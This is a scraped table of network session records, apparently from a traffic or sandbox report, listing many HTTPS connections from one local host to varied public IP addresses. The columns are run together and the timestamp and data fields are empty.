                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22309192.168.2.145500447.55.143.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22310192.168.2.144507459.95.66.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22311192.168.2.144256841.214.20.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22312192.168.2.1438748220.21.144.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22313192.168.2.14544144.218.191.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22314192.168.2.143629617.153.66.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22315192.168.2.1440920202.69.71.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22316192.168.2.145831094.159.148.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22317192.168.2.145295262.10.202.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22318192.168.2.1436628121.221.206.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22319192.168.2.1449578123.140.44.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22320192.168.2.1453498121.139.195.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22321192.168.2.1456426107.158.244.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22322192.168.2.1433660116.230.99.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22323192.168.2.1455794213.107.254.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22324192.168.2.1453850112.146.169.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22325192.168.2.1439820207.69.216.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22326192.168.2.145555620.182.172.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22327192.168.2.1439134125.60.57.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22328192.168.2.1451140205.108.85.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22329192.168.2.145551459.211.213.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22330192.168.2.1439060217.129.113.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22331192.168.2.145488423.162.211.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22332192.168.2.144684447.220.17.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22333192.168.2.143536058.231.0.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22334192.168.2.1441280184.176.118.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22335192.168.2.144164848.175.12.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22336192.168.2.1442780183.9.38.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22337192.168.2.145912291.64.158.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22338192.168.2.14348865.85.190.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22339192.168.2.1433862183.222.230.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22340192.168.2.143993298.207.25.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22341192.168.2.1448584122.83.235.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22342192.168.2.1460954184.130.205.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22343192.168.2.1435198146.106.21.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22344192.168.2.143976697.187.4.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22345192.168.2.1458138150.68.228.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22346192.168.2.14470861.248.250.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22347192.168.2.1447576137.11.34.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22348192.168.2.144201631.120.212.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22349192.168.2.1445000216.54.213.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22350192.168.2.143547251.112.183.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22351192.168.2.143742674.70.145.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22352192.168.2.1460092153.79.144.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22353192.168.2.145665651.64.71.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22354192.168.2.1453152192.92.193.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22355192.168.2.143836453.115.131.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22356192.168.2.143324639.201.193.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22357192.168.2.1457412210.68.192.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22358192.168.2.1438150203.13.161.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22359192.168.2.1460706135.207.190.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22360192.168.2.1445284194.254.158.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22361192.168.2.1434872122.213.120.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22362192.168.2.144489249.131.99.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22363192.168.2.1447762130.86.50.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22364192.168.2.14393024.201.32.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22365192.168.2.1454042138.150.228.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22366192.168.2.1448772124.231.247.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22367192.168.2.1456510171.236.177.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22368192.168.2.1442270173.93.89.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22369192.168.2.144701252.36.112.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22370192.168.2.143322686.187.68.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22371192.168.2.1444164193.240.53.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22372192.168.2.1441996128.248.56.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22373192.168.2.1442852109.214.91.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22374192.168.2.1452140104.67.216.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22375192.168.2.144469475.242.150.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22376192.168.2.1453284184.90.158.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22377192.168.2.1450018185.104.174.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22378192.168.2.145271831.112.149.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22379192.168.2.143715236.149.76.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22380192.168.2.1441812119.27.187.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22381192.168.2.1438180186.134.28.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22382192.168.2.1459988200.225.28.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22383192.168.2.145452635.124.203.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22384192.168.2.1454824200.202.164.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22385192.168.2.143520677.103.7.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22386192.168.2.144389862.78.174.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22387192.168.2.1452958190.137.79.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22388192.168.2.144476293.174.151.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22389192.168.2.1448546190.232.209.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22390192.168.2.1449024158.118.1.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22391192.168.2.1444006212.149.178.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22392192.168.2.1448776219.43.23.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22393192.168.2.1448170122.110.100.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22394192.168.2.1440120145.199.117.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22395192.168.2.145771889.175.125.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22396192.168.2.145167212.61.28.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22397192.168.2.144697874.254.65.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22398192.168.2.1441002179.110.202.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22399192.168.2.144510235.2.1.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22400192.168.2.1436636198.199.140.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22401192.168.2.1440950205.164.40.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22402192.168.2.144906414.27.241.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22403192.168.2.1452692122.142.4.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22404192.168.2.1441036164.177.162.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22405192.168.2.1456192193.131.169.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22406192.168.2.1446936165.122.167.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22407192.168.2.144186057.166.27.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22408192.168.2.1437552206.239.155.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22409192.168.2.14521305.154.177.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22410192.168.2.1459282136.67.125.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22411192.168.2.145626282.252.206.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22412192.168.2.145319818.97.110.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22413192.168.2.143664420.12.134.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22414192.168.2.1455890174.45.158.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22415192.168.2.1447662149.103.186.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22416192.168.2.144739696.228.44.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22417192.168.2.1455068116.1.134.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22418192.168.2.1436530197.64.84.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22419192.168.2.1437650152.22.95.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22420192.168.2.14384329.210.191.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22421192.168.2.145958074.117.249.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22422192.168.2.144244438.240.8.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22423192.168.2.144212437.116.149.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22424192.168.2.144786447.66.175.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22425192.168.2.1446408119.162.97.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22426192.168.2.145053849.105.178.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22427192.168.2.1455574107.95.231.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22428192.168.2.1434234145.100.163.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22429192.168.2.145613095.32.51.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22430192.168.2.145074482.253.17.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22431192.168.2.1445806190.199.17.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22432192.168.2.1433042202.199.220.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22433192.168.2.1437900147.110.253.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22434192.168.2.143718235.98.91.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22435192.168.2.1454288201.46.73.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22436192.168.2.143545423.231.123.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22437192.168.2.144726212.125.80.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22438192.168.2.143501271.43.46.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22439192.168.2.144540682.4.60.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22440192.168.2.1455636100.18.70.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22441192.168.2.14367468.161.77.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22442192.168.2.145585490.67.19.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22443192.168.2.145961096.174.204.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22444192.168.2.145525639.215.217.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22445192.168.2.144234040.175.78.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22446192.168.2.1453482101.98.216.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22447192.168.2.143484291.109.34.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22448192.168.2.144621649.231.99.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22449192.168.2.1448908116.151.39.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22450192.168.2.1459104130.12.9.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22451192.168.2.1448382201.105.1.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22452192.168.2.1457678212.255.0.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22453192.168.2.1435630207.21.212.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22454192.168.2.143970250.9.101.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22455192.168.2.144154625.122.245.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22456192.168.2.145134486.143.11.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22457192.168.2.1457596141.39.224.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22458192.168.2.145000467.226.73.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22459192.168.2.143768063.160.97.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22460192.168.2.1448088114.129.165.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22461192.168.2.1437416177.159.28.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22462192.168.2.14495388.53.24.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22463192.168.2.1458664130.198.39.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22464192.168.2.1451712175.80.144.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22465192.168.2.144924418.78.145.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22466192.168.2.1454844102.130.119.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22467192.168.2.1455434144.66.208.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22468192.168.2.144978286.8.160.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22469192.168.2.1433882109.224.212.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22470192.168.2.1449114152.228.104.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22471192.168.2.1437422103.73.83.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22472192.168.2.1457810111.127.59.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22473192.168.2.1442702219.92.129.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22474192.168.2.1446488197.109.40.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22475192.168.2.144128677.169.80.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22476192.168.2.144266848.54.99.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22477192.168.2.145628490.203.83.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22478192.168.2.1436920207.154.86.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22479192.168.2.1435024223.157.191.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22480192.168.2.145714086.57.47.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22481192.168.2.1452576150.52.36.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22482192.168.2.145055632.168.109.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22483192.168.2.1457284184.28.145.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22484192.168.2.1453814209.184.163.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22485192.168.2.1452660208.60.42.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22486192.168.2.1458630119.226.131.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22487192.168.2.1445870216.23.115.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22488192.168.2.1457920152.69.65.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22489192.168.2.143372214.253.126.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22490192.168.2.1437970100.157.217.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22491192.168.2.1457472212.135.98.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22492192.168.2.1452408176.161.213.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22493192.168.2.143649477.90.74.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22494192.168.2.1451922170.219.74.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22495192.168.2.145681227.113.131.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22496192.168.2.145734251.240.86.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22497192.168.2.1456828222.174.28.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22498192.168.2.1437152137.76.43.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22499192.168.2.1434358212.225.30.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22500192.168.2.144305674.234.163.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22501192.168.2.145492267.210.160.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22502192.168.2.1443846100.156.255.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22503192.168.2.1439900219.176.155.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22504192.168.2.145009689.248.244.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22505192.168.2.144308283.116.90.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22506192.168.2.1453946144.209.166.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22507192.168.2.1449890158.232.65.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22508192.168.2.145725091.194.251.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22509192.168.2.143494612.43.24.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22510192.168.2.1443290218.181.34.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22511192.168.2.143282097.89.231.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22512192.168.2.143532042.15.21.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22513192.168.2.144709062.128.48.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22514192.168.2.1438534205.7.151.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22515192.168.2.1443484194.147.181.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22516192.168.2.1445240217.130.145.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22517192.168.2.1460350203.198.58.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22518192.168.2.143926470.226.23.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22519192.168.2.143819651.158.188.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22520192.168.2.1454602185.68.31.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22521192.168.2.1459750221.226.164.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22522192.168.2.144780425.194.96.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22523192.168.2.1437050145.121.45.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22524192.168.2.1455932203.65.163.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22525192.168.2.144178273.49.16.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22526192.168.2.14550109.245.184.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22527192.168.2.143787289.139.32.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22528192.168.2.1454494164.211.46.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22529192.168.2.144792278.254.85.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22530192.168.2.1439788131.205.68.144443
